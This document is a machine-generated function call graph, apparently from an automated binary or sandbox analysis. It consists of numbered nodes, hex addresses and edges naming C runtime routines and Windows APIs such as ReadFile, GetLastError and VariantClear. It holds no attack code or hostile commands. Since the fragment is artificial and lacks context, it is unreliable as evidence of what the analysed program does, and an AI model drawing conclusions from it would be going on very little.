417f25 __mbstowcs_l_helper 10 API calls 87432->87433 87433->87434 87434->87404 87435->87407 87436->87414 87438 414c82 _raise 87437->87438 87439 414cbb _raise 87438->87439 87440 414cc3 87438->87440 87441 414c96 setSBCS 87438->87441 87439->87108 87442 415471 __lock_file 47 API calls 87440->87442 87464 417f77 46 API calls __getptd_noexit 87441->87464 87443 414ccb 87442->87443 87450 414aba 87443->87450 87446 414cb0 87465 417f25 10 API calls __mbstowcs_l_helper 87446->87465 87454 414ad8 setSBCS 87450->87454 87456 414af2 87450->87456 87451 414ae2 87517 417f77 46 API calls __getptd_noexit 87451->87517 87453 414ae7 87518 417f25 10 API calls __mbstowcs_l_helper 87453->87518 87454->87451 87454->87456 87459 414b2d 87454->87459 87466 414cfa RtlLeaveCriticalSection RtlLeaveCriticalSection _fseek 87456->87466 87458 414c38 setSBCS 87520 417f77 46 API calls __getptd_noexit 87458->87520 87459->87456 87459->87458 87460 414139 _fprintf 46 API calls 87459->87460 87467 41dfcc 87459->87467 87497 41d8f3 87459->87497 87519 41e0c2 46 API calls 3 library calls 87459->87519 87460->87459 87464->87446 87465->87439 87466->87439 87468 41dfd8 _raise 87467->87468 87469 41dfe0 87468->87469 87470 41dffb 87468->87470 87590 417f8a 46 API calls __getptd_noexit 87469->87590 87472 41e007 87470->87472 87475 41e041 87470->87475 87592 417f8a 46 API calls __getptd_noexit 87472->87592 87473 41dfe5 87591 417f77 46 API calls __getptd_noexit 87473->87591 87478 41e063 87475->87478 87479 41e04e 87475->87479 87477 41e00c 87593 417f77 46 API calls __getptd_noexit 87477->87593 87483 41ae56 ___lock_fhandle 48 API calls 87478->87483 87595 417f8a 46 API calls __getptd_noexit 87479->87595 87481 41e014 87594 417f25 10 API calls __mbstowcs_l_helper 87481->87594 87485 41e069 87483->87485 87484 41e053 87596 417f77 46 API calls __getptd_noexit 87484->87596 87489 41e077 87485->87489 87490 41e08b 87485->87490 87488 41dfed _raise 87488->87459 87521 41da15 87489->87521 87597 417f77 46 API calls __getptd_noexit 87490->87597 87493 41e083 87599 41e0ba RtlLeaveCriticalSection __unlock_fhandle 87493->87599 87494 41e090 87598 417f8a 46 API calls __getptd_noexit 87494->87598 87498 41d900 87497->87498 87501 41d915 87497->87501 87603 417f77 46 API calls __getptd_noexit 87498->87603 87500 41d905 87604 417f25 10 API calls __mbstowcs_l_helper 87500->87604 87503 41d94a 87501->87503 87511 41d910 87501->87511 87600 420603 87501->87600 87505 414139 _fprintf 46 API calls 87503->87505 87506 41d95e 87505->87506 87507 41dfcc __read 59 API calls 87506->87507 87508 41d965 87507->87508 87509 414139 _fprintf 46 API calls 87508->87509 87508->87511 87510 41d988 87509->87510 87510->87511 87512 414139 _fprintf 46 API calls 87510->87512 87511->87459 87513 41d994 87512->87513 87513->87511 87514 414139 _fprintf 46 API calls 87513->87514 87515 41d9a1 87514->87515 87516 414139 _fprintf 46 API calls 87515->87516 87516->87511 87517->87453 87518->87456 87519->87459 87520->87453 87522 41da31 87521->87522 87523 41da4c 87521->87523 87525 417f8a __close 46 API calls 87522->87525 87524 41da5b 87523->87524 87526 41da7a 87523->87526 87527 417f8a __close 46 API calls 87524->87527 87528 41da36 87525->87528 87530 41da98 87526->87530 87539 41daac 87526->87539 87529 41da60 87527->87529 87531 417f77 __mbstowcs_l_helper 46 API calls 87528->87531 87534 417f77 __mbstowcs_l_helper 46 API calls 87529->87534 87535 417f8a __close 46 API calls 87530->87535 87532 41da3e 87531->87532 87532->87493 87533 41db02 87537 417f8a __close 46 API calls 87533->87537 87536 41da67 87534->87536 87538 41da9d 87535->87538 87540 417f25 __mbstowcs_l_helper 10 API calls 87536->87540 87541 41db07 87537->87541 87542 417f77 __mbstowcs_l_helper 46 API calls 87538->87542 87539->87532 87539->87533 87545 41dae1 87539->87545 87547 41db1b 87539->87547 87540->87532 87543 417f77 __mbstowcs_l_helper 46 API calls 87541->87543 87544 41daa4 87542->87544 87543->87544 87546 417f25 __mbstowcs_l_helper 10 API calls 87544->87546 87545->87533 87550 41daec ReadFile 87545->87550 87546->87532 87549 416b04 __malloc_crt 46 API calls 87547->87549 87551 41db31 87549->87551 87552 41dc17 87550->87552 87553 41df8f GetLastError 87550->87553 87556 41db59 87551->87556 87557 41db3b 87551->87557 87552->87553 87560 41dc2b 87552->87560 87554 41de16 87553->87554 87555 41df9c 87553->87555 87564 417f9d __dosmaperr 46 API calls 87554->87564 87569 41dd9b 87554->87569 87558 417f77 __mbstowcs_l_helper 46 API calls 87555->87558 87561 420494 __lseeki64_nolock 48 API calls 87556->87561 87559 417f77 __mbstowcs_l_helper 46 API calls 87557->87559 87562 41dfa1 87558->87562 87563 41db40 87559->87563 87560->87569 87570 41dc47 87560->87570 87573 41de5b 87560->87573 87565 41db67 87561->87565 87566 417f8a __close 46 API calls 87562->87566 87567 417f8a __close 46 API calls 87563->87567 87564->87569 87565->87550 87566->87569 87567->87532 87568 413748 _free 46 API calls 87568->87532 87569->87532 87569->87568 87571 41dcab ReadFile 87570->87571 87578 41dd28 87570->87578 87576 41dcc9 GetLastError 87571->87576 87581 41dcd3 87571->87581 87572 41ded0 ReadFile 87574 41deef GetLastError 87572->87574 87582 41def9 87572->87582 87573->87569 87573->87572 87574->87573 87574->87582 87575 41ddec MultiByteToWideChar 87575->87569 87577 41de10 GetLastError 87575->87577 87576->87570 87576->87581 87577->87554 87578->87569 87579 41dda3 87578->87579 87580 41dd96 87578->87580 87586 41dd60 87578->87586 87579->87586 87587 41ddda 87579->87587 87583 417f77 __mbstowcs_l_helper 46 API calls 87580->87583 87581->87570 87584 420494 __lseeki64_nolock 48 API calls 87581->87584 87582->87573 87585 420494 __lseeki64_nolock 48 API calls 87582->87585 87583->87569 87584->87581 87585->87582 87586->87575 87588 420494 __lseeki64_nolock 48 API calls 87587->87588 87589 41dde9 87588->87589 87589->87575 87590->87473 87591->87488 87592->87477 87593->87481 87594->87488 87595->87484 87596->87481 87597->87494 87598->87493 87599->87488 87601 416b04 __malloc_crt 46 API calls 87600->87601 87602 420618 87601->87602 87602->87503 87603->87500 87604->87511 87608 4148b3 GetSystemTimeAsFileTime __aulldiv 87605->87608 87607 442c6b 87607->87111 87608->87607 87609->87118 87610->87122 87611->87122 87617 45272f __tzset_nolock _wcscpy 87612->87617 87613 44afef GetSystemTimeAsFileTime 87613->87617 87614 414d04 61 API calls __fread_nolock 87614->87617 87615 4528a4 87615->87032 87615->87033 87616 4150d1 81 API calls _fseek 87616->87617 87617->87613 87617->87614 87617->87615 87617->87616 87619 44b1bc 87618->87619 87620 44b1ca 87618->87620 87621 4149c2 116 API calls 87619->87621 87622 44b1e1 87620->87622 87623 4149c2 116 API calls 87620->87623 87624 44b1d8 87620->87624 87621->87620 87653 4321a4 87622->87653 87625 44b2db 87623->87625 87624->87060 87625->87622 87627 44b2e9 87625->87627 87631 44b2f6 87627->87631 87633 414a46 __fcloseall 82 API calls 87627->87633 87628 44b224 87629 44b253 87628->87629 87630 44b228 87628->87630 87657 43213d 87629->87657 87632 44b235 87630->87632 87635 414a46 __fcloseall 82 API calls 87630->87635 87631->87060 87636 44b245 87632->87636 87638 414a46 __fcloseall 82 API calls 87632->87638 87633->87631 87635->87632 87636->87060 87637 44b25a 87639 44b260 87637->87639 87640 44b289 87637->87640 87638->87636 87642 44b26d 87639->87642 87645 414a46 __fcloseall 82 API calls 87639->87645 87667 44b0bf 87 API calls 87640->87667 87643 44b27d 87642->87643 87646 414a46 __fcloseall 82 API calls 87642->87646 87643->87060 87644 44b28f 87668 4320f8 46 API calls _free 87644->87668 87645->87642 87646->87643 87648 44b295 87649 414a46 __fcloseall 82 API calls 87648->87649 87651 44b2a2 87648->87651 87649->87651 87650 44b2b2 87650->87060 87651->87650 87652 414a46 __fcloseall 82 API calls 87651->87652 87652->87650 87654 4321cb 87653->87654 87656 4321b4 __tzset_nolock _memmove 87653->87656 87655 414d04 __fread_nolock 61 API calls 87654->87655 87655->87656 87656->87628 87658 4135bb _malloc 46 API calls 87657->87658 87659 432150 87658->87659 87660 4135bb _malloc 46 API calls 87659->87660 87661 432162 87660->87661 87662 4135bb _malloc 46 API calls 87661->87662 87663 432174 87662->87663 87665 432189 87663->87665 87669 4320f8 46 API calls _free 87663->87669 87665->87637 87666 432198 87666->87637 87667->87644 87668->87648 87669->87666 87670->86963 87671->86965 87672->86983 87673->86983 87674->86983 87675->86977 87676->86983 87677->86983 87678->86988 87679->86997 87680->86995 87681->86995 87731 410160 87682->87731 87684 41012f GetFullPathNameW 87685 410147 ctype 87684->87685 87685->86820 87687 4102cb SHGetDesktopFolder 87686->87687 87688 410333 _wcsncpy 87686->87688 87687->87688 87689 4102e0 _wcsncpy 87687->87689 87688->86823 87689->87688 87690 41031c SHGetPathFromIDListW 87689->87690 87690->87688 87692 4101bb 87691->87692 87696 425f4a 87691->87696 87693 410160 52 API calls 87692->87693 87695 4101c7 87693->87695 87694 4114ab __wcsicoll 58 API calls 87694->87696 87735 410200 52 API calls 2 library calls 87695->87735 87696->87694 87700 425f6e 87696->87700 87698 4101d6 87736 410200 52 API calls 2 library calls 87698->87736 87700->86825 87701 4101e9 87701->86825 87703 40f760 128 API calls 87702->87703 87704 40f584 87703->87704 87705 429335 87704->87705 87706 40f58c 87704->87706 87709 4528bd 118 API calls 87705->87709 87707 40f598 87706->87707 87708 429358 87706->87708 87754 4033c0 113 API calls 7 library calls 87707->87754 87755 434034 86 API calls _wprintf 87708->87755 87712 42934b 87709->87712 87715 429373 87712->87715 87716 42934f 87712->87716 87713 429369 87713->87715 87714 40f5b4 87714->86821 87717 4115d7 52 API calls 87715->87717 87718 431e58 82 API calls 87716->87718 87730 4293c5 ctype 87717->87730 87718->87708 87719 42959c 87720 413748 _free 46 API calls 87719->87720 87721 4295a5 87720->87721 87722 431e58 82 API calls 87721->87722 87723 4295b1 87722->87723 87727 401b10 52 API calls 87727->87730 87730->87719 87730->87727 87737 444af8 87730->87737 87740 402780 87730->87740 87748 4022d0 87730->87748 87756 44c7dd 64 API calls 3 library calls 87730->87756 87757 44b41c 52 API calls 87730->87757 87732 410167 _wcslen 87731->87732 87733 4115d7 52 API calls 87732->87733 87734 41017e _wcscpy 87733->87734 87734->87684 87735->87698 87736->87701 87738 4115d7 52 API calls 87737->87738 87739 444b27 _memmove 87738->87739 87739->87730 87742 402827 87740->87742 87747 402790 ctype _memmove 87740->87747 87741 4115d7 52 API calls 87744 402797 87741->87744 87743 4115d7 52 API calls 87742->87743 87743->87747 87745 4115d7 52 API calls 87744->87745 87746 4027bd 87744->87746 87745->87746 87746->87730 87747->87741 87749 4022e0 87748->87749 87751 40239d 87748->87751 87750 4115d7 52 API calls 87749->87750 87749->87751 87752 402320 ctype 87749->87752 87750->87752 87751->87730 87752->87751 87753 4115d7 52 API calls 87752->87753 87753->87752 87754->87714 87755->87713 87756->87730 87757->87730 87759 402417 87758->87759 87760 402539 ctype 87758->87760 87759->87760 87761 4115d7 52 API calls 87759->87761 87760->86829 87762 402443 87761->87762 87763 4115d7 52 API calls 87762->87763 87764 4024b4 87763->87764 87764->87760 87766 4022d0 52 API calls 87764->87766 87787 402880 95 API calls 2 library calls 87764->87787 87766->87764 87771 401566 87767->87771 87768 401794 87788 40e9a0 90 API calls 87768->87788 87771->87768 87772 40167a 87771->87772 87773 4010a0 52 API calls 87771->87773 87774 4017c0 87772->87774 87789 45e737 90 API calls 3 library calls 87772->87789 87773->87771 87774->86831 87776 40bc70 52 API calls 87775->87776 87785 40d451 87776->87785 87777 40d50f 87792 410600 52 API calls 87777->87792 87779 427c01 87793 45e737 90 API calls 3 library calls 87779->87793 87780 40e0a0 52 API calls 87780->87785 87782 401b10 52 API calls 87782->87785 87783 40d519 87783->86834 87785->87777 87785->87779 87785->87780 87785->87782 87785->87783 87790 40f310 53 API calls 87785->87790 87791 40d860 91 API calls 87785->87791 87787->87764 87788->87772 87789->87774 87790->87785 87791->87785 87792->87783 87793->87783 87794->86848 87795->86847 87797 42c5fe 87796->87797 87812 4091c6 87796->87812 87798 40bc70 52 API calls 87797->87798 87797->87812 87799 42c64e InterlockedIncrement 87798->87799 87800 42c665 87799->87800 87806 42c697 87799->87806 87802 42c672 InterlockedDecrement Sleep InterlockedIncrement 87800->87802 87800->87806 87801 42c737 InterlockedDecrement 87803 42c74a 87801->87803 87802->87800 87802->87806 87805 408f40 VariantClear 87803->87805 87804 42c731 87804->87801 87807 42c752 87805->87807 87806->87801 87806->87804 88089 408e80 87806->88089 88102 410c60 87807->88102 87812->86908 87813 42c6db 87814 402160 52 API calls 87813->87814 87815 42c6e5 87814->87815 87816 45340c 85 API calls 87815->87816 87817 42c6f1 87816->87817 88099 40d200 52 API calls 2 library calls 87817->88099 87819 42c6fb 88100 465124 53 API calls 87819->88100 87821 42c715 87822 42c76a 87821->87822 87823 42c719 87821->87823 87824 401b10 52 API calls 87822->87824 88101 46fe32 VariantClear 87823->88101 87826 42c77e 87824->87826 87827 401980 53 API calls 87826->87827 87833 42c796 87827->87833 87828 42c812 88113 46fe32 VariantClear 87828->88113 87830 42c82a InterlockedDecrement 88114 46ff07 54 API calls 87830->88114 87832 42c864 88115 45e737 90 API calls 3 library calls 87832->88115 87833->87828 87833->87832 88107 40ba10 87833->88107 87834 42c9ec 87840 401980 53 API calls 87850 42c849 87840->87850 87841 408f40 VariantClear 87841->87850 87844 408f40 VariantClear 87847 42c891 87844->87847 87845 402780 52 API calls 87845->87850 87849 410c60 VariantClear 87847->87849 87849->87812 87850->87834 87850->87840 87850->87841 87850->87845 88116 40a780 87850->88116 87851 42c874 87851->87844 87853 42ca59 87851->87853 87853->87853 87855 40afc4 87854->87855 87856 40b156 87854->87856 87857 40afd5 87855->87857 87858 42d1e3 87855->87858 88172 45e737 90 API calls 3 library calls 87856->88172 87863 40a780 199 API calls 87857->87863 87874 40b11a ctype 87857->87874 88173 45e737 90 API calls 3 library calls 87858->88173 87861 42d1f8 87867 408f40 VariantClear 87861->87867 87862 40b143 87862->86908 87865 40b00a 87863->87865 87865->87861 87868 40b012 87865->87868 87866 42d4db 87866->87866 87867->87862 87869 42d231 VariantClear 87868->87869 87870 40b04a 87868->87870 87878 40b094 ctype 87868->87878 87879 40b05c ctype 87869->87879 87870->87879 88174 40e270 VariantClear ctype 87870->88174 87871 42d45a VariantClear 87871->87874 87872 40b108 87872->87874 88175 40e270 VariantClear ctype 87872->88175 87874->87862 88176 45e737 90 API calls 3 library calls 87874->88176 87875 4115d7 52 API calls 87875->87878 87877 42d425 ctype 87877->87871 87877->87874 87878->87872 87878->87877 87879->87875 87879->87878 87881 408fff 87880->87881 87883 40900d 87880->87883 88223 403ea0 52 API calls __cinit 87881->88223 87885 42c3f6 87883->87885 87887 42c44a 87883->87887 87888 40a780 199 API calls 87883->87888 87889 42c47b 87883->87889 87893 42c4cb 87883->87893 87894 42c564 87883->87894 87898 42c548 87883->87898 87900 409112 87883->87900 87901 4090df 87883->87901 87903 42c528 87883->87903 87905 4090ea 87883->87905 87914 4090f2 ctype 87883->87914 88225 4534e3 52 API calls 87883->88225 88227 40c4e0 199 API calls 87883->88227 88226 45e737 90 API calls 3 library calls 87885->88226 88228 45e737 90 API calls 3 library calls 87887->88228 87888->87883 88229 451b42 61 API calls 87889->88229 88177 47faae 87893->88177 87895 408f40 VariantClear 87894->87895 87895->87914 87896 42c491 87896->87914 88230 45e737 90 API calls 3 library calls 87896->88230 88233 45e737 90 API calls 3 library calls 87898->88233 87899 42c4da 87899->87914 88231 45e737 90 API calls 3 library calls 87899->88231 87900->87898 87908 40912b 87900->87908 87901->87905 87906 408e80 VariantClear 87901->87906 88232 45e737 90 API calls 3 library calls 87903->88232 87910 408f40 VariantClear 87905->87910 87906->87905 87908->87914 88224 403e10 53 API calls 87908->88224 87910->87914 87912 40914b 87913 408f40 VariantClear 87912->87913 87913->87914 87914->86908 88420 408d90 87915->88420 87917 429778 87918 410c60 VariantClear 87917->87918 87919 429780 87918->87919 87920 408cf9 87920->87917 87921 42976c 87920->87921 87923 408d2d 87920->87923 88445 45e737 90 API calls 3 library calls 87921->88445 88436 403d10 87923->88436 87926 408d71 ctype 87926->86908 87927 408f40 VariantClear 87928 408d45 ctype 87927->87928 87928->87926 87928->87927 87930 425c87 87929->87930 87933 40d15f 87929->87933 87931 425cc7 87930->87931 87932 425ca1 TranslateAcceleratorW 87930->87932 87932->87933 87933->86908 87935 42602f 87934->87935 87938 40d17f 87934->87938 87935->86908 87936 40d18c 87936->86908 87937 42608e IsDialogMessageW 87937->87936 87937->87938 87938->87936 87938->87937 88659 430c46 GetClassLongW 87938->88659 87941 4096c6 _wcslen 87940->87941 87942 40a70c ctype _memmove 87941->87942 87943 4115d7 52 API calls 87941->87943 87946 4013a0 52 API calls 87942->87946 87944 4096fa _memmove 87943->87944 87945 4115d7 52 API calls 87944->87945 87947 40971b 87945->87947 87948 4297aa 87946->87948 87947->87942 87949 409749 CharUpperBuffW 87947->87949 87954 40976a ctype 87947->87954 87950 4115d7 52 API calls 87948->87950 87949->87954 87951 4297d1 _memmove 87950->87951 88684 45e737 90 API calls 3 library calls 87951->88684 87961 4097e5 ctype 87954->87961 88661 47dcbb 201 API calls 87954->88661 87955 408f40 VariantClear 87956 42ae92 87955->87956 87957 410c60 VariantClear 87956->87957 87958 42aea4 87957->87958 87959 409aa2 87959->87951 87962 4115d7 52 API calls 87959->87962 87966 409afe 87959->87966 87960 40a689 87964 4115d7 52 API calls 87960->87964 87961->87951 87961->87959 87961->87960 87963 4115d7 52 API calls 87961->87963 87965 40c2c0 52 API calls 87961->87965 87970 429a46 VariantClear 87961->87970 87976 40a6af ctype _memmove 87961->87976 87977 408f40 VariantClear 87961->87977 87988 40ba10 52 API calls 87961->87988 87993 4299d9 87961->87993 87997 429abd 87961->87997 88004 40a780 199 API calls 87961->88004 88011 42a452 87961->88011 88662 40c4e0 199 API calls 87961->88662 88663 40e270 VariantClear ctype 87961->88663 87962->87966 87963->87961 87964->87976 87965->87961 87967 409b2a 87966->87967 87968 4115d7 52 API calls 87966->87968 87969 429dbe 87967->87969 88031 409b4d ctype _memmove 87967->88031 88667 40b400 VariantClear VariantClear ctype 87967->88667 87974 429d31 87968->87974 87979 429dd3 87969->87979 88668 40b400 VariantClear VariantClear ctype 87969->88668 87970->87961 87971 409fd2 87975 40a045 87971->87975 88028 42a3f5 87971->88028 87973 429d42 87983 40e0a0 52 API calls 87973->87983 87974->87973 88664 44a801 52 API calls 87974->88664 87981 4115d7 52 API calls 87975->87981 87991 4115d7 52 API calls 87976->87991 87977->87961 87990 40e1c0 VariantClear 87979->87990 87979->88031 87986 40a04c 87981->87986 87987 429d57 87983->87987 87992 40a0a7 87986->87992 87995 4091e0 316 API calls 87986->87995 88665 453443 52 API calls 87987->88665 87988->87961 87989 42a42f 88672 45e737 90 API calls 3 library calls 87989->88672 87990->88031 87991->87942 88012 40a0af 87992->88012 88673 40c790 VariantClear ctype 87992->88673 87996 408f40 VariantClear 87993->87996 87995->87992 87999 4299e2 87996->87999 87997->86908 87998 429d88 88666 453443 52 API calls 87998->88666 88009 410c60 VariantClear 87999->88009 88004->87961 88006 402780 52 API calls 88006->88031 88007 4115d7 52 API calls 88007->88031 88008 44a801 52 API calls 88008->88031 88063 40a650 ctype 88009->88063 88010 408f40 VariantClear 88042 40a162 ctype _memmove 88010->88042 88011->87955 88013 40a11b 88012->88013 88014 42a4b4 VariantClear 88012->88014 88012->88042 88020 40a12d ctype 88013->88020 88674 40e270 VariantClear ctype 88013->88674 88014->88020 88015 40a780 199 API calls 88015->88031 88016 408e80 VariantClear 88016->88031 88018 401980 53 API calls 88018->88031 88019 4115d7 52 API calls 88019->88042 88020->88019 88020->88042 88022 408e80 VariantClear 88022->88042 88023 42a74d VariantClear 88023->88042 88024 41130a 51 API calls __cinit 88024->88031 88025 40a368 88027 42aad4 88025->88027 88035 40a397 88025->88035 88026 40e270 VariantClear 88026->88042 88677 46fe90 VariantClear VariantClear ctype 88027->88677 88671 47390f VariantClear 88028->88671 88029 42a7e4 VariantClear 88029->88042 88030 42a886 VariantClear 88030->88042 88031->87942 88031->87971 88031->87989 88031->88006 88031->88007 88031->88008 88031->88015 88031->88016 88031->88018 88031->88024 88031->88028 88034 409c95 88031->88034 88669 45f508 52 API calls 88031->88669 88670 403e10 53 API calls 88031->88670 88032 40a3ce 88047 40a3d9 ctype 88032->88047 88678 40b400 VariantClear VariantClear ctype 88032->88678 88034->86908 88035->88032 88059 40a42c ctype 88035->88059 88660 40b400 VariantClear VariantClear ctype 88035->88660 88038 4115d7 52 API calls 88038->88042 88039 42abaf 88043 42abd4 VariantClear 88039->88043 88053 40a4ee ctype 88039->88053 88040 40a4dc 88040->88053 88680 40e270 VariantClear ctype 88040->88680 88041 4115d7 52 API calls 88044 42a5a6 VariantInit VariantCopy 88041->88044 88042->88010 88042->88022 88042->88023 88042->88025 88042->88026 88042->88027 88042->88029 88042->88030 88042->88038 88042->88041 88675 470870 52 API calls 88042->88675 88676 44ccf1 VariantClear ctype 88042->88676 88043->88053 88044->88042 88049 42a5c6 VariantClear 88044->88049 88045 42ac4f 88054 42ac79 VariantClear 88045->88054 88060 40a546 ctype 88045->88060 88048 40a41a 88047->88048 88051 42ab44 VariantClear 88047->88051 88047->88059 88048->88059 88679 40e270 VariantClear ctype 88048->88679 88049->88042 88050 40a534 88050->88060 88681 40e270 VariantClear ctype 88050->88681 88051->88059 88053->88045 88053->88050 88054->88060 88055 42ad28 88061 42ad4e VariantClear 88055->88061 88066 40a583 ctype 88055->88066 88058 40a571 88058->88066 88682 40e270 VariantClear ctype 88058->88682 88059->88039 88059->88040 88060->88055 88060->88058 88061->88066 88063->86908 88064 42ae0e VariantClear 88064->88066 88066->88063 88066->88064 88683 40e270 VariantClear ctype 88066->88683 88067->86908 88068->86858 88069->86862 88070->86908 88071->86908 88072->86908 88073->86908 88074->86913 88075->86913 88076->86913 88077->86913 88078->86913 88079->86913 88080->86913 88082 403cdf 88081->88082 88083 408f40 VariantClear 88082->88083 88084 403ce7 88083->88084 88084->86901 88085->86913 88086->86913 88087->86908 88088->86855 88090 408e88 88089->88090 88092 408e94 88089->88092 88091 408f40 VariantClear 88090->88091 88091->88092 88093 45340c 88092->88093 88094 453439 88093->88094 88096 453419 88093->88096 88094->87813 88095 45342f 88095->87813 88096->88095 88159 4531b1 85 API calls 5 library calls 88096->88159 88098 453425 88098->87813 88099->87819 88100->87821 88101->87804 88103 410c73 ctype 88102->88103 88104 428372 88102->88104 88103->87812 88106 42838c 88104->88106 88160 40e1c0 88104->88160 88108 40ba49 88107->88108 88109 40ba1b ctype _memmove 88107->88109 88111 4115d7 52 API calls 88108->88111 88110 4115d7 52 API calls 88109->88110 88112 40ba22 88110->88112 88111->88109 88112->87833 88113->87830 88114->87850 88115->87851 88117 40a7a6 88116->88117 88159->88098 88161 408f40 VariantClear 88160->88161 88162 40e1cb ctype 88161->88162 88162->88104 88172->87858 88173->87861 88174->87879 88175->87874 88176->87866 88178 408e80 VariantClear 88177->88178 88181 47fb02 88178->88181 88182 47fc59 88181->88182 88184 47fc2b 88181->88184 88192 408f40 VariantClear 88181->88192 88201 47fcd4 88181->88201 88204 408e80 VariantClear 88181->88204 88219 47fc1d 88181->88219 88234 475a67 88181->88234 88262 47b291 88181->88262 88273 46fe32 VariantClear 88181->88273 88183 40a780 199 API calls 88182->88183 88186 47fc6a 88183->88186 88187 408f40 VariantClear 88184->88187 88186->88184 88190 47fc7d 88186->88190 88191 47fc8c 88186->88191 88188 47fc33 88187->88188 88189 408f40 VariantClear 88188->88189 88193 47fc3b 88189->88193 88275 45e737 90 API calls 3 library calls 88190->88275 88195 40ba10 52 API calls 88191->88195 88192->88181 88196 408f40 VariantClear 88193->88196 88197 47fc98 88195->88197 88199 47fc43 88196->88199 88276 47b2f4 144 API calls 88197->88276 88202 410c60 VariantClear 88199->88202 88200 47fca7 88203 408f40 VariantClear 88200->88203 88206 408f40 VariantClear 88201->88206 88205 47fc4b 88202->88205 88207 47fcb1 88203->88207 88204->88181 88205->87899 88208 47fcdc 88206->88208 88209 408f40 VariantClear 88207->88209 88210 408f40 VariantClear 88208->88210 88211 47fcb9 88209->88211 88212 47fce4 88210->88212 88213 408f40 VariantClear 88211->88213 88214 408f40 VariantClear 88212->88214 88216 47fcc1 88213->88216 88215 47fcec 88214->88215 88217 410c60 VariantClear 88215->88217 88218 410c60 VariantClear 88216->88218 88220 47fcf4 88217->88220 88221 47fcc9 88218->88221 88274 45e538 90 API calls 3 library calls 88219->88274 88220->87899 88221->87899 88223->87883 88224->87912 88225->87883 88226->87914 88227->87883 88228->87914 88229->87896 88230->87914 88231->87914 88232->87914 88233->87894 88235 475ae5 88234->88235 88238 475ac5 88234->88238 88277 45e737 90 API calls 3 library calls 88235->88277 88237 475afe 88239 408f40 VariantClear 88237->88239 88238->88235 88240 402780 52 API calls 88238->88240 88241 475b42 88238->88241 88245 475b06 88239->88245 88240->88238 88242 402780 52 API calls 88241->88242 88243 475b60 88242->88243 88244 475c7c 88243->88244 88247 40c2c0 52 API calls 88243->88247 88248 40a780 199 API calls 88243->88248 88250 475cc7 88243->88250 88252 40ba10 52 API calls 88243->88252 88253 475cd5 88243->88253 88254 408f40 VariantClear 88243->88254 88259 475ca0 88243->88259 88278 40c4e0 199 API calls 88243->88278 88246 408f40 VariantClear 88244->88246 88245->88181 88249 475c84 88246->88249 88247->88243 88248->88243 88249->88181 88251 408f40 VariantClear 88250->88251 88257 475ca8 88251->88257 88252->88243 88279 45e737 90 API calls 3 library calls 88253->88279 88254->88243 88257->88181 88258 475ce8 88260 408f40 VariantClear 88258->88260 88261 408f40 VariantClear 88259->88261 88260->88257 88261->88257 88263 47b2e7 88262->88263 88264 47b2a5 88262->88264 88263->88181 88280 40e710 88264->88280 88267 47b2b7 88291 47974b 88267->88291 88268 47b2cf 88270 47974b 144 API calls 88268->88270 88272 47b2df 88270->88272 88271 47b2c7 88271->88181 88272->88181 88273->88181 88274->88184 88275->88184 88276->88200 88277->88237 88278->88243 88279->88258 88281 408f40 VariantClear 88280->88281 88282 40e71b 88281->88282 88283 4115d7 52 API calls 88282->88283 88284 40e729 88283->88284 88285 40e734 88284->88285 88286 426bdc 88284->88286 88287 426be7 88285->88287 88288 401b10 52 API calls 88285->88288 88286->88287 88289 40bc70 52 API calls 88286->88289 88290 40e743 88288->88290 88289->88287 88290->88267 88290->88268 88292 479786 88291->88292 88293 479aed 88291->88293 88292->88293 88296 479798 88292->88296 88360 451b42 61 API calls 88293->88360 88295 479b00 88295->88271 88297 4797a2 88296->88297 88298 4797be 88296->88298 88353 451b42 61 API calls 88297->88353 88300 4797c7 88298->88300 88301 4797e3 88298->88301 88354 451b42 61 API calls 88300->88354 88331 441eba 88301->88331 88304 4797b5 88304->88271 88305 4797da 88305->88271 88306 4797f7 88307 479815 88306->88307 88308 4797fe 88306->88308 88312 47983c 88307->88312 88336 451d2b 88307->88336 88355 451b42 61 API calls 88308->88355 88310 47980c 88310->88271 88316 4798e6 88312->88316 88347 479714 88312->88347 88313 47994b VariantInit 88316->88313 88317 479916 VariantClear 88316->88317 88317->88316 88332 441f12 88331->88332 88333 441ecc _wcslen 88331->88333 88332->88306 88333->88332 88334 410160 52 API calls 88333->88334 88335 441ede 88334->88335 88335->88306 88338 451d5e 88336->88338 88337 451e93 SysFreeString 88342 451ea0 88337->88342 88338->88337 88339 451f21 88338->88339 88338->88342 88346 451d68 88338->88346 88340 451f6d lstrcmpiW 88339->88340 88341 451f7f SysFreeString 88339->88341 88339->88342 88344 451fab 88339->88344 88340->88341 88341->88339 88342->88346 88344->88312 88346->88312 88348 479728 88347->88348 88353->88304 88354->88305 88355->88310 88360->88295 88421 4289d2 88420->88421 88422 408db3 88420->88422 88450 45e737 90 API calls 3 library calls 88421->88450 88446 40bec0 88422->88446 88425 4289e5 88451 45e737 90 API calls 3 library calls 88425->88451 88427 428a05 88429 408f40 VariantClear 88427->88429 88428 40ba10 52 API calls 88430 408dc9 88428->88430 88431 408e5a 88429->88431 88430->88425 88430->88427 88430->88428 88430->88431 88432 40a780 199 API calls 88430->88432 88433 408e64 88430->88433 88435 408f40 VariantClear 88430->88435 88431->87920 88432->88430 88434 408f40 VariantClear 88433->88434 88434->88431 88435->88430 88437 408f40 VariantClear 88436->88437 88438 403d20 88437->88438 88439 403cd0 VariantClear 88438->88439 88440 403d4d 88439->88440 88453 477145 88440->88453 88458 4755ad 88440->88458 88461 46f8cb 88440->88461 88441 403d76 88441->87917 88441->87928 88445->87917 88448 40bed0 88446->88448 88447 40bef2 88447->88430 88448->88447 88452 45e737 90 API calls 3 library calls 88448->88452 88450->88425 88451->88427 88452->88447 88454 408e80 VariantClear 88453->88454 88455 47715a 88454->88455 88480 467ac4 88455->88480 88457 477160 88457->88441 88503 475077 88458->88503 88460 4755c0 88460->88441 88462 46f8e7 88461->88462 88463 46f978 88461->88463 88464 46f900 88462->88464 88465 46f93c 88462->88465 88466 46f91a 88462->88466 88479 46f8ee 88462->88479 88463->88441 88468 45340c 85 API calls 88464->88468 88467 45340c 85 API calls 88465->88467 88469 45340c 85 API calls 88466->88469 88471 46f958 88467->88471 88468->88479 88470 46f931 88469->88470 88473 45340c 85 API calls 88470->88473 88474 45340c 85 API calls 88471->88474 88472 45340c 85 API calls 88475 46f971 88472->88475 88473->88479 88476 46f95f 88474->88476 88609 46cb5f 88475->88609 88478 45340c 85 API calls 88476->88478 88478->88479 88479->88472 88481 467bb8 88480->88481 88482 467adc 88480->88482 88481->88457 88483 467c1d 88482->88483 88484 467c16 88482->88484 88485 467b90 88482->88485 88494 467aed 88482->88494 88487 4115d7 52 API calls 88483->88487 88502 40e270 VariantClear 